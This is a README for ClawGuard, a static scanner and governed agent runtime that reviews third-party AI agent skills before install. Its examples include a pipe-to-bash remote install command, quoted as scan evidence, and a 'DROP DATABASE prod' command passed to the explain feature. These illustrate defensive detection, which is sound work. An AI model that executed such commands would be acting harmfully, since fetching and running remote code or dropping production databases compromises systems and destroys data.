ClawGuard is explainable governance for AI agents and the skills/tools they use — for developers and teams who install third-party OpenClaw-style skills or run governed agents locally.
Before you trust a skill or let an agent act, ClawGuard answers:
What could this do if I trusted it?
This project is compatible with OpenClaw-style workflows but is not affiliated with OpenClaw or Hermes Agent. See docs/GLOSSARY.md for ecosystem terms.
| Part | You use it when… | First commands |
|---|---|---|
| ClawGuard Core | You want to scan, gate, and install skills/MCP configs before they reach a trusted folder | scan, gate, check, install, monitor |
| ClawGuard Agent | You want a governed agent runtime with approvals, audit, and blast-radius preflight | agent init, agent run, explain, setup-ui |
ClawGuard (umbrella)
|
+---------------+---------------+
| |
ClawGuard Core ClawGuard Agent
scan / gate / install governed runtime (optional)
(install-time gate) autonomy + approvals + audit
Core sits between discovery and your trusted skill folder:
native search/discovery → candidate skill → ClawGuard gate → allow / approval / block → trusted folder
Agent adds a policy layer on running work: tool calls pass through a deterministic autonomy gate, not just prose promises. Full agent docs: docs/AGENT.md.
Review a skill before install:
npx --yes --package @denial-web/clawguard@beta clawguard scan ./path/to/skill --policy governed
npx --yes --package @denial-web/clawguard@beta clawguard gate ./path/to/skill --policy governedStable automation payload: clawguard check … --json → clawguard.check.v1. Threat model: docs/THREAT_MODEL.md.
Run a governed workspace:
npx --yes --package @denial-web/clawguard@beta clawguard agent init
npx --yes --package @denial-web/clawguard@beta clawguard setup-ui
npx --yes --package @denial-web/clawguard@beta clawguard explain -- psql -c "DROP DATABASE prod"Threat model: docs/AGENT_THREAT_MODEL.md. Portable setup: docs/PORTABLE_AGENT_SETUP.md.
Test the published package from a folder outside this repository:
mkdir -p ~/clawguard-test
cd ~/clawguard-test
npx --yes --package @denial-web/clawguard@beta clawguard --version
npx --yes --package @denial-web/clawguard@beta clawguard init --profile local-first
npx --yes --package @denial-web/clawguard@beta clawguard demo quickstart
npx --yes --package @denial-web/clawguard@beta clawguard scan /path/to/skill --config ./.clawguard.jsonWhen working inside this source checkout:
node src/cli.js --version
node src/cli.js scan examples/risky-skillVerify it works (expected outcomes in this checkout):
node src/cli.js --version→1.0.0-beta.10node src/cli.js scan examples/risky-skill→ CRITICAL risk with harmful-content findingsnode src/cli.js scan examples/safe-skill→ low or no critical findings
See docs/EXTERNAL_TESTING.md for a clean teammate smoke test and docs/FIVE_MINUTE_TESTER_KIT.md for handing it to someone on another PC.
Scan a candidate skill:
npx --package @denial-web/clawguard clawguard scan ./path/to/skillUse gate mode before installing or trusting a skill:
npx --package @denial-web/clawguard clawguard gate ./path/to/skill --policy governedGate mode exits with 0 for allow, 1 for warn/review/sandbox decisions, and 2 for block.
Get a stable agent-facing decision payload (clawguard.check.v1) that other tools can route on:
npx --package @denial-web/clawguard clawguard check ./path/to/skill --policy governed --jsoncheck returns one of allow, manual_review, or block with a matching recommendedAction (auto_install, require_user_approval, reject) and the same 0/1/2 exit codes as gate. Pass --write-report <path> to also persist the full scan report alongside the compact decision. The output is frozen to schemas/clawguard-check.schema.json; see docs/INTEGRATION_SPEC.md.
Use install mode to copy a skill only after the gate allows it:
npx --package @denial-web/clawguard clawguard install ./path/to/skill --to ./.agents/skills --policy governedInstall mode never executes scanned files or installs dependencies. It refuses warn/review/sandbox/block decisions before copying.
Install directly from an HTTPS tarball URL (the same gate, but the bundle is fetched into a quarantine first):
npx --package @denial-web/clawguard clawguard install https://example.com/skill.tar.gz \
--to ./.agents/skills/my-skill --policy governed --integrity sha256-AbCd...=== --jsonThe wrapper downloads into .clawguard/quarantine/<run-id>/, never executes any code, rejects symlinks and path-traversal entries, validates redirects against private/loopback hosts, and only copies into the trusted destination once check returns allow. On manual_review it writes a clawguard.approval.v1 record and retains the quarantine; finish later with clawguard install --resume <approval-id>. URL installs support HTTPS .tar.gz / .tgz, .zip, and clawhub:<slug>@<version> (resolved via .clawhub/lock.json, including GitHub tree/ sources). See docs/INSTALL_WRAPPER_SPEC.md and schemas/clawguard-install.schema.json.
For agent runtimes that already manage discovery and trusted folders, gate only the install step:
npx --package @denial-web/clawguard clawguard openclaw install ./candidate-skill --to ./.agents/skills --approval-out ./.clawguard/approvals.jsonl
npx --package @denial-web/clawguard clawguard hermes install ./candidate-skill --to ~/.hermes/skills --approval-out ./.clawguard/approvals.jsonlTo detect bypass attempts after an agent writes directly into a trusted folder, run monitor mode:
npx --package @denial-web/clawguard clawguard monitor ./.agents/skills \
--approvals ./.clawguard/approvals.jsonl \
--decisions ./.clawguard/decisions.jsonl \
--quarantine ./.clawguard/quarantine \
--audit-log ./.clawguard/monitor.jsonlCombine skill risk, model routing, and budget into one agent run plan:
npx --package @denial-web/clawguard clawguard run-plan \
--config .clawguard.json \
--skill ./path/to/skill \
--task "Install and run this skill" \
--privacy medium \
--tool-risk high \
--approval-out ./.clawguard/approvals.jsonlRun plans are non-destructive: they produce one combined governance decision and can write one approval request with skill, model, and budget context. See docs/RUN_PLAN.md.
Run the local web demo (Core scanner UI):
npm run webOpen http://127.0.0.1:4173. The demo supports pasted SKILL.md content, local folder scanning, and HTML report download. See docs/WEB_DEMO.md.
- Remote code download or execution
- OpenClaw
SKILL.mdfrontmatter and declared requirements - Metadata mismatches such as undeclared env vars, binaries, config files, network access, or install steps
- ClawHub lockfile and origin metadata drift
- Dependency manifests and lockfiles for npm and Python skill bundles
- MCP/plugin config risk in
.cursor/mcp.json,.openclaw/mcp.json,.openclaw/plugins.json, andmcp.json - OpenClaw
openclaw.plugin.jsonpackage manifests and runtime metadata - Credential and secret references
- Destructive shell commands
- Prompt-injection style instructions
- Broad filesystem, shell, browser, email, calendar, Slack, or GitHub permissions
- External network access
- Estimated token spend before expensive model calls
- Dry-run physical device plans for cameras, drones, robots, IoT, and industrial OT
Reproducible reports for beta testers — not marketing slides.
| Report | What it measures | Regenerate |
|---|---|---|
| Scanner benchmark (HTML) | clawguard check precision/recall on a labeled corpus |
npm run bench |
| Policy enforcement | Deterministic autonomy gate vs bare LLM gatekeepers (unsafe-auto, adversarial flips; n=50) | npm run bench:agent:policy:combined |
| Agent schema benchmark | Governance JSON schema compliance (eval shim + optional live LLM) | npm run bench:agent:full |
| Model-agnostic matrix | ClawGuard(X) vs bare X under same schema | npm run bench:agent:matrix |
Headline from policy enforcement (honest framing): on dangerous actions, tested systems gated 100% (0% unsafe auto-exec). ClawGuard’s gate is prose-invariant (0% adversarial flip); bare models can flip or loosen under task-pressure prose — see the doc for per-model detail. This is structural enforcement, not a claim that other models are reckless.
Optional: npm run bench:competitors. Doctrine Lab trace export: CLAWGUARD_DOCTRINE_EXPORT=1 npm run bench:scanner (requires local Doctrine Lab on 127.0.0.1:8000).
npm test— Node test runner (450+ tests in this checkout).npm run lint— ESLint onsrc/**,scripts/**, and benchmark paths.- CI runs lint + tests on every push (workflow).
Contributing: CONTRIBUTING.md. Full doc index: docs/README.md.
ClawGuard automatically looks for .clawguard.json from the scan target upward. Start from .clawguard.example.json.
{
"policy": "governed",
"failOn": "critical",
"failOnPolicy": true,
"policyFailOn": "manual_review",
"maxFileSizeBytes": "1mb",
"maxFindingsPerRulePerFile": 5,
"suppressions": []
}Policy presets:
personal— warn on medium, review high, block critical.governed— review medium, sandbox high, block critical.enterprise— review medium, require stronger approval for high, block critical and undeclared secret access.
Starter profiles: docs/CONFIG_TEMPLATES.md. Rules: docs/RULES.md. Policy model: docs/POLICY_MODEL.md.
- id: clawguard
uses: denial-web/clawguard@v1
with:
target: skills
policy: governed
fail-on-policy: "true"
sarif: clawguard.sarif
check: "true"
check-output: clawguard.check.json
- if: steps.clawguard.outputs.decision == 'manual_review'
run: echo "needs human review: ${{ steps.clawguard.outputs.summary }}"The Action emits SARIF and clawguard.check.v1 JSON, plus step outputs decision, risk, summary, recommended-action, check-json-path, and sarif-path. See docs/GITHUB_ACTION.md.
ClawGuard scan: /path/to/examples/risky-skill
Risk: CRITICAL (100/100)
Policy: block (personal)
Files scanned: 1
Files skipped: 0
Fail threshold: critical
Findings:
- [CRITICAL] Downloads or executes remote code
SKILL.md:10
Evidence: curl https://example.com/install.sh | bash
Recommendation: Review the download source manually and run only in a sandbox.
JSON: --json. SARIF: --sarif clawguard.sarif. HTML: --html clawguard.html.
ClawGuard can write approval requests for OpenClaw, Hermes, Telegram, WhatsApp, or any owner channel before files reach a trusted folder:
npx --package @denial-web/clawguard clawguard approvals demo-flow --keepSee docs/AGENT_MESSAGING_SETUP.md for Telegram, WhatsApp, and agent-native messaging.
ClawGuard Core is a static scanner for the install path: it reads skill files and reports risky patterns; it does not execute skill code, install dependencies, or contact external services during a scan.
Good defaults:
- No runtime dependencies in the core scan path
- Skips symbolic links
- Skips files larger than 1 MB by default
- Explainable rules instead of hidden scoring
Limits:
- Static analysis can miss novel or heavily obfuscated attacks.
- Findings are risk signals, not proof of malicious intent.
- A clean scan does not guarantee a skill is safe.
Agent runtime limits: docs/AGENT_THREAT_MODEL.md. Core threat model: docs/THREAT_MODEL.md.
- docs/AGENT.md — governed agent runtime
- docs/PORTABLE_AGENT_SETUP.md — OpenClaw / Hermes / PicoClaw workspace setup
- docs/SOP_PACKS.md — SOP packs for small-business workflows
- docs/FINANCIAL_AI_GOVERNOR.md — financial-services governor (early)
- docs/PHYSICAL_DEVICE_AI_GOVERNOR.md — physical-device planning track
- docs/INTEGRATION_SPEC.md — OpenClaw, ClawHub, GitHub Action, MCP
- docs/INSTALL_WRAPPER_SPEC.md — URL install quarantine flow
- docs/CURSOR_USB_HANDOFF.md — offline USB handoff
- docs/MOBILE_APPROVAL_HANDOFF.md — mobile approval handoff
- docs/HUGGINGFACE.md — demo Space
- docs/ARCHITECTURE.md — product and module architecture
- docs/REPORT_SCHEMA.md — versioned JSON contracts
- docs/COMPARISON.md — this repo vs other GitHub projects named "ClawGuard"
ClawGuard is a companion project, not a fork or replacement. The goal is to make OpenClaw-style ecosystems safer with a fast, explainable review before installing third-party skills — and, optionally, a governed agent that enforces the same policy at runtime.
MIT